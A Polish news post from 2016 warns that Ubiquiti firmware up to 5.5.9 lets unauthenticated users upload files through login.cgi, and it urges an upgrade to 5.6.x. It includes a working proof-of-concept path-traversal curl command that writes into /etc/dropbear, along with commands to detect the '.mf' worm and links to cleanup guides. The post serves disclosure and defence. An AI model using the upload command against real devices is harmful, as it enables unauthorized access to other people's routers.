strona główna

 

diagnostyka

 

mapy

 

Pogoda

 

Warte polecenia

 

News - Dziurawe Ubiquiti do wersji 5.5.9 ! Zalecana aktualizacja do 5.6.X !

   15-05-2016 01:21:06       Odwiedziny: 1509



Jeśli jesteś szczęśliwym posiadaczem urządzenia ze stajni Ubiquiti to muszę Cie zasmucić. Wersje do 5.5.9 posiadają coś na kształt furtki przez którą można przecisnąć plik i dać dostęp dla nieupoważnionych osób niemających loginu i hasła. Wystarczy, że znany jest port http lub https dzięki któremu logujesz się na swoje urządzenie.
Sprawdź sam:
echo "kazuko" > /tmp/kazuko
curl -F "file=@/tmp/kazuko;filename=../../etc/dropbear/kazuko" -H "Expect:" 'http://1.1.1.1:80/login.cgi' -k
ssh -p 22 ubnt@1.1.1.1 "cat /etc/dropbear/kazuko"

Niestety już ktoś próbuje to wykorzystać i wrzuca wirusy.
Aby sprawdzić czy Twoje urządzenie zostało zawirusowane wykonaj to polecenie z linuxowego terminala:
ssh -p 22 ubnt@1.1.1.1 "ls -a /etc/persistent/ | grep mf"
Lub zaloguj się na urządzenie po ssh (putty) i wykonaj:
ls -a /etc/persistent/ | grep mf
Jeśli Twoim oczom ukarze się coś w stylu:
XW.v5.5.9# ls -a /etc/persistent/ | grep mf
.mf
To znaczy, że urządzenie zostało zakażone.

Jeśli masz więcej urządzeń od Ubiquiti to na pewno zainteresuje Cie skrypt detectMFinUBNT, który sprawdzi te urządzenia czy są zainfekowane.

Jak wyleczyć? sprawdź tu:
https://trzepak.pl/viewtopic.php?f=26&t=51641
http://community.ubnt.com/t5/airMAX-General-Discussion/Virus-attack-URGENT-UBNT/td-p/1562940

Copyright seszu © 30.10.2010-2024.